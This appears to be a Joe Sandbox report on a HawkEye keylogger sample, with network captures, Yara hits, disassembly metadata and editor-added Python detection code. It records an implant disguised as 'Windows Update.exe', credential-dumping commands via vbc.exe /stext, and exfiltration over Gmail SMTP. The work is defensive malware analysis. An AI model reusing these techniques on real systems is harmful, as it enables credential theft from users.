Feb 17, 2021 14:16:01.135674953 CET | 8.8.8.8 | 192.168.2.22 | 0x92f1 | No error (0) | cdn.digicertcdn.com | | 104.18.11.39 | A (IP address) | IN (0x0001)
Feb 17, 2021 14:16:01.195561886 CET | 8.8.8.8 | 192.168.2.22 | 0x1175 | No error (0) | cdn.digicertcdn.com | | 104.18.11.39 | A (IP address) | IN (0x0001)
Feb 17, 2021 14:16:01.195561886 CET | 8.8.8.8 | 192.168.2.22 | 0x1175 | No error (0) | cdn.digicertcdn.com | | 104.18.10.39 | A (IP address) | IN (0x0001)

HTTP Request Dependency Graph

• whatismyipaddress.com

HTTP Packets

Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.22 | 49167 | 104.16.155.36 | 80 | C:\Users\user\AppData\Roaming\Windows Update.exe

Timestamp | kBytes transferred | Direction | Data
Feb 17, 2021 14:15:57.188503981 CET | 0 | OUT | GET / HTTP/1.1
    Host: whatismyipaddress.com
    Connection: Keep-Alive
Feb 17, 2021 14:15:57.240376949 CET | 1 | IN | HTTP/1.1 403 Forbidden
    Date: Wed, 17 Feb 2021 13:15:57 GMT
    Content-Type: text/plain; charset=UTF-8
    Content-Length: 16
    Connection: keep-alive
    X-Frame-Options: SAMEORIGIN
    Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
    Expires: Thu, 01 Jan 1970 00:00:01 GMT
    Set-Cookie: __cfduid=df511a3b29767e188cc5ceb9545d8c6061613567757; expires=Fri, 19-Mar-21 13:15:57 GMT; path=/; domain=.whatismyipaddress.com; HttpOnly; SameSite=Lax; Secure
    cf-request-id: 0851bb23a500004a8588a22000000001
    Server: cloudflare
    CF-RAY: 622fc7b2aa474a85-FRA
    alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
    Data Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 31 30 32 30
    Data Ascii: error code: 1020
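Read together, the DNS, TCP and HTTP tables above show the sequence a detection engineer cares about: the dropped copy (Windows Update.exe) resolves whatismyipaddress.com and fetches its public address, then roughly 1.4 seconds later opens TCP 587 to smtp.gmail.com. The IP check itself failed (Cloudflare answered 403 with error code 1020, an access-rule block) and the sample carried on to SMTP regardless, so a rule for this pattern should key on the connection attempts, not on a successful HTTP response. The Python below is an added example by the editor, not code from the Joe Sandbox report or from HawkEye: it correlates an "external IP check" flow with a subsequent outbound mail-submission flow from the same process inside a short window. The records are constructed from the report's tables; attributing the port-587 flow to Windows Update.exe is an assumption (the report names the process only for the HTTP session), and the svchost.exe packet is a constructed benign control.

```python
"""Correlate a sandbox's DNS answers and TCP packets into an "external IP check,
then outbound mail submission" indicator: the exfiltration shape this report's
network tables show (whatismyipaddress.com lookup, then smtp.gmail.com:587).
Editor's example, not code from the Joe Sandbox report or from HawkEye."""
from __future__ import annotations

from dataclasses import dataclass
from datetime import datetime, timedelta

# Public "what is my IP" services that stealers commonly query before reporting home.
IP_CHECK_DOMAINS = {"whatismyipaddress.com", "checkip.dyndns.org", "api.ipify.org"}
MAIL_SUBMISSION_PORTS = {25, 465, 587}
ALLOWED_MAIL_RELAYS: set[str] = set()        # your own relays; assumed empty here
CORRELATION_WINDOW = timedelta(seconds=120)  # how long after the IP check a mail flow still counts


@dataclass(frozen=True)
class DnsAnswer:
    ts: datetime
    name: str
    address: str

@dataclass(frozen=True)
class TcpPacket:
    ts: datetime
    src_ip: str
    src_port: int
    dst_ip: str
    dst_port: int
    process: str  # owning process as attributed by the sandbox

@dataclass(frozen=True)
class Finding:
    process: str
    ip_check_host: str
    mail_host: str
    mail_port: int
    seconds_between: float


def parse_ts(s: str) -> datetime:
    """Parse 'Feb 17, 2021 14:15:57.146359921 CET'. strptime's %f accepts at most
    six fractional digits, so the nanosecond tail is truncated to microseconds."""
    head, _, frac = s.replace(" CET", "").partition(".")
    return datetime.strptime(f"{head}.{frac[:6] or '0'}", "%b %d, %Y %H:%M:%S.%f")

def names_for_addresses(answers: list[DnsAnswer]) -> dict[str, set[str]]:
    """Invert the DNS answers: address -> names it was returned for."""
    out: dict[str, set[str]] = {}
    for a in answers:
        out.setdefault(a.address, set()).add(a.name)
    return out

def first_packet_per_flow(packets: list[TcpPacket]) -> list[TcpPacket]:
    """Keep the earliest packet of each 4-tuple (the connection attempt), so
    retransmits and data segments do not produce repeated hits."""
    first: dict[tuple, TcpPacket] = {}
    for p in sorted(packets, key=lambda p: p.ts):
        first.setdefault((p.src_ip, p.src_port, p.dst_ip, p.dst_port), p)
    return list(first.values())

def correlate(answers: list[DnsAnswer], packets: list[TcpPacket]) -> list[Finding]:
    names = names_for_addresses(answers)
    flows = first_packet_per_flow(packets)
    ip_checks = [f for f in flows if names.get(f.dst_ip, set()) & IP_CHECK_DOMAINS]
    findings: list[Finding] = []
    for chk in ip_checks:
        for f in flows:
            if (f.process != chk.process or f.dst_port not in MAIL_SUBMISSION_PORTS
                    or f.dst_ip in ALLOWED_MAIL_RELAYS):
                continue
            delta = f.ts - chk.ts  # only flows opened after the IP check count
            if timedelta(0) <= delta <= CORRELATION_WINDOW:
                findings.append(Finding(
                    process=chk.process,
                    ip_check_host=min(names[chk.dst_ip] & IP_CHECK_DOMAINS),
                    mail_host=min(names.get(f.dst_ip, {f.dst_ip})),
                    mail_port=f.dst_port,
                    seconds_between=delta.total_seconds(),
                ))
    return findings


# Constructed from this report's DNS Answers and TCP Packets tables. Attributing the
# SMTP flow to Windows Update.exe is an assumption; the svchost.exe packet is a control.
IMPLANT = r"C:\Users\user\AppData\Roaming\Windows Update.exe"
SAMPLE_ANSWERS = [
    DnsAnswer(parse_ts("Feb 17, 2021 14:15:57.088181019 CET"), "whatismyipaddress.com", "104.16.155.36"),
    DnsAnswer(parse_ts("Feb 17, 2021 14:15:58.366976023 CET"), "smtp.gmail.com", "66.102.1.108"),
    DnsAnswer(parse_ts("Feb 17, 2021 14:16:01.135674953 CET"), "cdn.digicertcdn.com", "104.18.10.39"),
]
SAMPLE_PACKETS = [
    TcpPacket(parse_ts("Feb 17, 2021 14:15:57.146359921 CET"), "192.168.2.22", 49167, "104.16.155.36", 80, IMPLANT),
    TcpPacket(parse_ts("Feb 17, 2021 14:15:57.188503981 CET"), "192.168.2.22", 49167, "104.16.155.36", 80, IMPLANT),
    TcpPacket(parse_ts("Feb 17, 2021 14:15:58.591355085 CET"), "192.168.2.22", 49168, "66.102.1.108", 587, IMPLANT),
    TcpPacket(parse_ts("Feb 17, 2021 14:16:01.200000000 CET"), "192.168.2.22", 49170, "104.18.10.39", 443, r"C:\Windows\System32\svchost.exe"),
]

def run_sample() -> list[Finding]:
    return correlate(SAMPLE_ANSWERS, SAMPLE_PACKETS)
```

Running `run_sample()` yields one finding for Windows Update.exe: whatismyipaddress.com followed by smtp.gmail.com:587 about 1.44 s later. The relay allowlist is what keeps this from firing on a genuine mail client that happens to share a host with an IP-check widget; populate it with the submission hosts your fleet is actually permitted to use.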


SMTP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP | Commands
Feb 17, 2021 14:15:58.753774881 CET | 587 | 49168 | 66.102.1.108 | 192.168.2.22 | 220 smtp.gmail.com ESMTP c3sm3856483wrr.29 - gsmtp
Feb 17, 2021 14:15:58.768049955 CET | 49168 | 587 | 192.168.2.22 | 66.102.1.108 | EHLO 376483
Feb 17, 2021 14:15:58.823973894 CET | 587 | 49168 | 66.102.1.108 | 192.168.2.22 | 250-smtp.gmail.com at your service, [84.17.52.38]
    250-SIZE 35882577
    250-8BITMIME
    250-STARTTLS
    250-ENHANCEDSTATUSCODES
    250-PIPELINING
    250-CHUNKING
    250 SMTPUTF8
Feb 17, 2021 14:15:58.825731993 CET | 49168 | 587 | 192.168.2.22 | 66.102.1.108 | STARTTLS
Feb 17, 2021 14:15:58.878711939 CET | 587 | 49168 | 66.102.1.108 | 192.168.2.22 | 220 2.0.0 Ready to start TLS
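The SMTP capture ends where it does for a reason: once the server answers 220 to STARTTLS, the AUTH exchange (the operator's Gmail credentials), the envelope and the stolen data all travel inside TLS, so the rest of the port-587 traffic in the TCP table is opaque to a passive capture. What a capture does yield is the plaintext prelude: the server banner, the name the client announced in EHLO, the capability list, and the address literal the server echoed back (here `[84.17.52.38]`, the address the sandbox's traffic reached Google from). The Python below is an added example by the editor, not code from the report or from HawkEye; it parses that prelude, handling RFC 5321 multi-line replies (`250-` continuation versus `250 ` final line), and stops at the TLS switch. The transcript is constructed from the SMTP Packets table.

```python
"""Extract what remains readable from the plaintext prelude of an SMTP
submission session that switches to STARTTLS, as in this report's capture.
Editor's example, not code from the Joe Sandbox report or from HawkEye.
After the server's 220 to STARTTLS everything else (AUTH, MAIL FROM/RCPT TO,
the message) is inside TLS; the fields below are all a passive capture yields."""
from __future__ import annotations

import re
from dataclasses import dataclass, field

# RFC 5321 4.2: 3-digit code, then '-' for a continuation line or ' ' (or nothing) for the last line.
REPLY_LINE = re.compile(r"^(\d{3})([ -]?)(.*)$")


@dataclass
class SmtpPrelude:
    server_name: str = ""        # first token of the 220 banner
    banner: str = ""
    ehlo_name: str = ""          # identity the client claimed
    client_seen_as: str = ""     # address literal the server echoed in its 250 greeting
    capabilities: list[str] = field(default_factory=list)
    starttls_offered: bool = False
    starttls_accepted: bool = False


def parse_reply_line(line: str) -> tuple[str, bool, str] | None:
    """Return (code, is_last_line, text), or None if the line is not an SMTP reply."""
    m = REPLY_LINE.match(line.rstrip("\r\n"))
    if not m:
        return None
    code, sep, text = m.groups()
    return code, sep != "-", text


def parse_prelude(transcript: list[tuple[str, str]]) -> SmtpPrelude:
    """transcript: ('S' | 'C', line) pairs in capture order, up to the TLS switch."""
    st = SmtpPrelude()
    pending_cmd = ""          # client command the next complete reply answers
    reply: list[str] = []     # text lines of the multi-line reply being assembled
    for direction, line in transcript:
        if direction == "C":
            pending_cmd = line.strip()
            verb, _, arg = pending_cmd.partition(" ")
            if verb.upper() in ("EHLO", "HELO"):
                st.ehlo_name = arg.strip()
            continue
        parsed = parse_reply_line(line)
        if parsed is None:
            raise ValueError(f"not an SMTP reply line: {line!r}")
        code, last, text = parsed
        reply.append(text)
        if not last:
            continue  # more lines of this reply follow
        verb = pending_cmd.split(" ", 1)[0].upper()
        if code == "220" and not pending_cmd:
            st.banner = text
            st.server_name = text.split(" ", 1)[0]
        elif code == "250" and verb in ("EHLO", "HELO"):
            m = re.search(r"\[([^\]]+)\]", reply[0])
            st.client_seen_as = m.group(1) if m else ""
            st.capabilities = reply[1:]
            st.starttls_offered = any(c.upper() == "STARTTLS" for c in st.capabilities)
        elif code == "220" and verb == "STARTTLS":
            st.starttls_accepted = True
            break  # everything after this is TLS records, not SMTP text
        reply, pending_cmd = [], ""
    return st


# Constructed from this report's SMTP Packets table.
SAMPLE_TRANSCRIPT = [
    ("S", "220 smtp.gmail.com ESMTP c3sm3856483wrr.29 - gsmtp"),
    ("C", "EHLO 376483"),
    ("S", "250-smtp.gmail.com at your service, [84.17.52.38]"),
    ("S", "250-SIZE 35882577"),
    ("S", "250-8BITMIME"),
    ("S", "250-STARTTLS"),
    ("S", "250-ENHANCEDSTATUSCODES"),
    ("S", "250-PIPELINING"),
    ("S", "250-CHUNKING"),
    ("S", "250 SMTPUTF8"),
    ("C", "STARTTLS"),
    ("S", "220 2.0.0 Ready to start TLS"),
]


def run_sample() -> SmtpPrelude:
    return parse_prelude(SAMPLE_TRANSCRIPT)
```

For the recorded session `run_sample()` returns server_name smtp.gmail.com, ehlo_name 376483, client_seen_as 84.17.52.38, seven capabilities, and both STARTTLS flags set. If you need the credentials or the message itself, the place to get them is not the wire but the process: the .NET SmtpClient call happens in the implant's own memory, which is also where the Yara matches in the process section below come from.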

                                                                                Code Manipulations

Statistics

CPU Usage, Memory Usage, High Level Behavior Distribution and Behavior are interactive charts in the original report and are not reproduced here.

                                                                                System Behavior

General

Start time: 14:15:32
Start date: 17/02/2021
Path: C:\Users\user\Desktop\Sample_B.exe
Wow64 process (32bit): true
Commandline: 'C:\Users\user\Desktop\Sample_B.exe'
Imagebase: 0xbc0000
File size: 533504 bytes
MD5 hash: 78300BD48D50FA7E5F3F6A933CC5F739
Has elevated privileges: true
Has administrator privileges: true
Programmed in: .Net C# or VB.NET
Yara matches:
• Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 00000000.00000002.2076206862.0000000000BC2000.00000020.00020000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
• Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000000.00000002.2076206862.0000000000BC2000.00000020.00020000.sdmp, Author: Joe Security
• Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000000.00000002.2076206862.0000000000BC2000.00000020.00020000.sdmp, Author: Joe Security
• Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000000.00000002.2076206862.0000000000BC2000.00000020.00020000.sdmp, Author: Joe Security
• Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000000.00000002.2076206862.0000000000BC2000.00000020.00020000.sdmp, Author: JPCERT/CC Incident Response Group
• Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 00000000.00000000.2069232329.0000000000BC2000.00000020.00020000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
• Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000000.00000000.2069232329.0000000000BC2000.00000020.00020000.sdmp, Author: Joe Security
• Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000000.00000000.2069232329.0000000000BC2000.00000020.00020000.sdmp, Author: Joe Security
• Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000000.00000000.2069232329.0000000000BC2000.00000020.00020000.sdmp, Author: Joe Security
• Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000000.00000000.2069232329.0000000000BC2000.00000020.00020000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation: low

General

Start time: 14:15:35
Start date: 17/02/2021
Path: C:\Users\user\AppData\Roaming\Windows Update.exe
Wow64 process (32bit): true
Commandline: 'C:\Users\user\AppData\Roaming\Windows Update.exe'
Imagebase: 0xee0000
File size: 533504 bytes
MD5 hash: 78300BD48D50FA7E5F3F6A933CC5F739
Has elevated privileges: true
Has administrator privileges: true
Programmed in: .Net C# or VB.NET
Yara matches:
                                                                                • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000002.00000002.2112965167.0000000003610000.00000004.00000001.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000002.00000002.2112485117.0000000003371000.00000004.00000001.sdmp, Author: Joe Security
                                                                                • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 00000002.00000002.2111753690.0000000000EE2000.00000020.00020000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                                • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000002.00000002.2111753690.0000000000EE2000.00000020.00020000.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000002.00000002.2111753690.0000000000EE2000.00000020.00020000.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000002.00000002.2111753690.0000000000EE2000.00000020.00020000.sdmp, Author: Joe Security
                                                                                • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000002.00000002.2111753690.0000000000EE2000.00000020.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                • Rule: HKTL_NET_GUID_Stealer, Description: Detects c# red/black-team tools via typelibguid, Source: 00000002.00000002.2113607102.00000000046F0000.00000004.00000001.sdmp, Author: Arnim Rupp
                                                                                • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 00000002.00000000.2075201287.0000000000EE2000.00000020.00020000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                                • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000002.00000000.2075201287.0000000000EE2000.00000020.00020000.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000002.00000000.2075201287.0000000000EE2000.00000020.00020000.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000002.00000000.2075201287.0000000000EE2000.00000020.00020000.sdmp, Author: Joe Security
                                                                                • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000002.00000000.2075201287.0000000000EE2000.00000020.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 00000002.00000003.2082749506.00000000054A9000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                                • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000002.00000003.2082749506.00000000054A9000.00000004.00000001.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000002.00000003.2082749506.00000000054A9000.00000004.00000001.sdmp, Author: Joe Security
                                                                                • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000002.00000003.2082749506.00000000054A9000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                • Rule: HKTL_NET_GUID_Stealer, Description: Detects c# red/black-team tools via typelibguid, Source: 00000002.00000002.2113562918.00000000046E0000.00000004.00000001.sdmp, Author: Arnim Rupp
                                                                                • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 00000002.00000002.2111820758.0000000002371000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                                • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000002.00000002.2111820758.0000000002371000.00000004.00000001.sdmp, Author: Joe Security
                                                                                • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000002.00000002.2111820758.0000000002371000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                • Rule: HKTL_NET_GUID_Stealer, Description: Detects c# red/black-team tools via typelibguid, Source: C:\Users\user\AppData\Roaming\Windows Update.exe, Author: Arnim Rupp
                                                                                • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: C:\Users\user\AppData\Roaming\Windows Update.exe, Author: Kevin Breen <kevin@techanarchy.net>
                                                                                • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: C:\Users\user\AppData\Roaming\Windows Update.exe, Author: Joe Security
                                                                                • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: C:\Users\user\AppData\Roaming\Windows Update.exe, Author: Joe Security
                                                                                • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: C:\Users\user\AppData\Roaming\Windows Update.exe, Author: Joe Security
                                                                                • Rule: Hawkeye, Description: detect HawkEye in memory, Source: C:\Users\user\AppData\Roaming\Windows Update.exe, Author: JPCERT/CC Incident Response Group
                                                                                Antivirus matches:
                                                                                • Detection: 100%, Avira
                                                                                • Detection: 100%, Avira
                                                                                • Detection: 100%, Joe Sandbox ML
                                                                                Reputation:low

                                                                                General

                                                                                Start time:14:15:38
                                                                                Start date:17/02/2021
                                                                                Path:C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:dw20.exe -x -s 1708
                                                                                Imagebase:0x10000000
                                                                                File size:33936 bytes
                                                                                MD5 hash:FBA78261A16C65FA44145613E3669E6E
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:moderate

                                                                                General

                                                                                Start time:14:15:41
                                                                                Start date:17/02/2021
                                                                                Path:C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holdermail.txt'
                                                                                Imagebase:0x400000
                                                                                File size:1170056 bytes
                                                                                MD5 hash:1672D0478049ABDAF0197BE64A7F867F
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:moderate

                                                                                General

                                                                                Start time:14:15:42
                                                                                Start date:17/02/2021
                                                                                Path:C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holderwb.txt'
                                                                                Imagebase:0x400000
                                                                                File size:1170056 bytes
                                                                                MD5 hash:1672D0478049ABDAF0197BE64A7F867F
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:moderate

                                                                                Disassembly

                                                                                Code Analysis


                                                                                  Execution Graph

                                                                                  Execution Coverage:2.2%
                                                                                  Dynamic/Decrypted Code Coverage:100%
                                                                                  Signature Coverage:5.1%
                                                                                  Total number of Nodes:118
                                                                                  Total number of Limit Nodes:10

                                                                                  Graph


                                                                                  Executed Functions

                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2075974979.0000000000550000.00000040.00000001.sdmp, Offset: 00550000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_550000_Sample_B.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: @q($Dp($Lq($Pp($Xq($\p($hp($tp(
                                                                                  • API String ID: 0-287671918
                                                                                  • Opcode ID: 5f16042c5f17d6d168c1b1ce951458ccbaabdac114defb2a7a3be260c49d4e9e
                                                                                  • Instruction ID: a5a149db858e85ddfb5310a4d6e4607c084da4532bd2d2dfc8e5e41e11ccbf80
                                                                                  • Opcode Fuzzy Hash: 5f16042c5f17d6d168c1b1ce951458ccbaabdac114defb2a7a3be260c49d4e9e
                                                                                  • Instruction Fuzzy Hash: 2803CE74A012298FDB65DF68C894BADBBB6BB49304F1085EAD40DA7394DB309E85CF50
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Control-flow Graph

                                                                                  control_flow_graph 670 5d0d87-5d0df7 674 5d0dfc-5d0e13 670->674 675 5d0df9 670->675 677 5d0e15-5d0e35 bind 674->677 678 5d0e57-5d0e5c 674->678 675->674 681 5d0e5e-5d0e63 677->681 682 5d0e37-5d0e54 677->682 678->677 681->682
                                                                                  APIs
                                                                                  • bind.WS2_32(?,00000E40,12098A28,00000000,00000000,00000000,00000000), ref: 005D0E1B
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2076067982.00000000005D0000.00000040.00000001.sdmp, Offset: 005D0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_5d0000_Sample_B.jbxd
                                                                                  Similarity
                                                                                  • API ID: bind
                                                                                  • String ID:
                                                                                  • API String ID: 1187836755-0
                                                                                  • Opcode ID: eb7bb18835e633ec2c0f1ecd4a6343752ab3d9bac864572935f1b50d9be6ea5f
                                                                                  • Instruction ID: a891d03cd9240b91e036c8fbc7cc591de5f8c102526f9f8c521968d13487632d
                                                                                  • Opcode Fuzzy Hash: eb7bb18835e633ec2c0f1ecd4a6343752ab3d9bac864572935f1b50d9be6ea5f
                                                                                  • Instruction Fuzzy Hash: FD219171509380AFE722CB65DC44F96BFB8EF06320F08849BE944CB292D275A909CB71
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • listen.WS2_32(?,00000E40,12098A28,00000000,00000000,00000000,00000000), ref: 005D0A00
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2076067982.00000000005D0000.00000040.00000001.sdmp, Offset: 005D0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_5d0000_Sample_B.jbxd
                                                                                  Similarity
                                                                                  • API ID: listen
                                                                                  • String ID:
                                                                                  • API String ID: 3257165821-0
                                                                                  • Opcode ID: 1c1aadcd31f46bef516bfb3ec98961f05032928f4209eba3c2482413f4fdef5f
                                                                                  • Instruction ID: d8747f0229ac15da1b950a4e72954ba169c548b09ffbafefe162f84ada3c91c6
                                                                                  • Opcode Fuzzy Hash: 1c1aadcd31f46bef516bfb3ec98961f05032928f4209eba3c2482413f4fdef5f
                                                                                  • Instruction Fuzzy Hash: E721C4B2404384AFEB22CB54DC85F96BFA8EF42320F0985DBE9489F193D274A905C761
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • bind.WS2_32(?,00000E40,12098A28,00000000,00000000,00000000,00000000), ref: 005D0E1B
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2076067982.00000000005D0000.00000040.00000001.sdmp, Offset: 005D0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_5d0000_Sample_B.jbxd
                                                                                  Similarity
                                                                                  • API ID: bind
                                                                                  • String ID:
                                                                                  • API String ID: 1187836755-0
                                                                                  • Opcode ID: c3de1c1e8a6cdbee51f8f7f34cd9cef10fbb06fafe25a26304eb18e3a0c60c4e
                                                                                  • Instruction ID: 5812cb5ec2af910b10a6e205a53585b55e443ec0f6d0a4f0e02376b7a6511dc5
                                                                                  • Opcode Fuzzy Hash: c3de1c1e8a6cdbee51f8f7f34cd9cef10fbb06fafe25a26304eb18e3a0c60c4e
                                                                                  • Instruction Fuzzy Hash: 76118F72500344EFEB20DF55DC85FA6FBECEF04720F14896BEA499B281D674A944CAB1
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • listen.WS2_32(?,00000E40,12098A28,00000000,00000000,00000000,00000000), ref: 005D0A00
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2076067982.00000000005D0000.00000040.00000001.sdmp, Offset: 005D0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_5d0000_Sample_B.jbxd
                                                                                  Similarity
                                                                                  • API ID: listen
                                                                                  • String ID:
                                                                                  • API String ID: 3257165821-0
                                                                                  • Opcode ID: 5e78c8f88d46af485d45fe7feb9d5b5585879ed80a81134726170cd0f4f96b25
                                                                                  • Instruction ID: c2515154d965988fcd180cfaeea9a99106e5494f0a9c3e115d48e04b05f05cd5
                                                                                  • Opcode Fuzzy Hash: 5e78c8f88d46af485d45fe7feb9d5b5585879ed80a81134726170cd0f4f96b25
                                                                                  • Instruction Fuzzy Hash: 0011E171500304EFFB21DF15DC85BA6FBA8EF44720F1484ABED099B281D674A9048BB1
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Control-flow Graph

                                                                                  control_flow_graph 382 550d30-550d40 383 550d47-5511fd call 551530 382->383 384 550d42 382->384 447 551204-551221 383->447 448 5511ff 383->448 384->383 450 551223 447->450 451 551228-55123b 447->451 448->447 450->451 455 55123d call a807f8 451->455 456 55123d call 551c60 451->456 457 55123d call a8081e 451->457 458 55123d call 551c5f 451->458 453 551242-551248 455->453 456->453 457->453 458->453
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2075974979.0000000000550000.00000040.00000001.sdmp, Offset: 00550000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_550000_Sample_B.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: _qq$ p($dq($p(
                                                                                  • API String ID: 0-926209368
                                                                                  • Opcode ID: 6067826ae932f8e58aab904514a658fb818f0e1043bc89f6471283d77513cd28
                                                                                  • Instruction ID: 393793de78f5aa94071b91ff73015fd6a078b83b0cef8c707ba9318c076832bb
                                                                                  • Opcode Fuzzy Hash: 6067826ae932f8e58aab904514a658fb818f0e1043bc89f6471283d77513cd28
                                                                                  • Instruction Fuzzy Hash: A9E1AA34A0130ADFDB04EFA4D494EDDBBB2FF85348F5485A8D4056B369DB316A4ADB80
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Control-flow Graph

                                                                                  control_flow_graph 459 550898-5508c9 460 5508d0-5508fe 459->460 461 5508cb 459->461 462 550900-550911 460->462 463 55091b 460->463 461->460 462->463 468 550913-550919 462->468 464 550922-55092e 463->464 466 550934-55094e 464->466 467 550cb2-550cc6 464->467 471 550954-550978 466->471 472 550a1f-550a42 466->472 468->464 475 55097f-550982 471->475 476 55097a-55097d 471->476 482 550a49-550a6b 472->482 477 550985-5509af 475->477 476->477 483 5509b1-550a10 477->483 484 550a1b-550a1d 477->484 486 550a72-550a75 482->486 487 550a6d-550a70 482->487 483->484 484->482 489 550a78-550aa7 486->489 487->489 495 550abf 489->495 496 550aa9-550abd 489->496 497 550ac2 495->497 496->497 500 550ac9-550c7c 497->500 503 550c83-550c86 500->503 504 550c7e-550c81 500->504 505 550c89-550ca6 503->505 504->505 505->467
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2075974979.0000000000550000.00000040.00000001.sdmp, Offset: 00550000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_550000_Sample_B.jbxd
                                                                                  Similarity
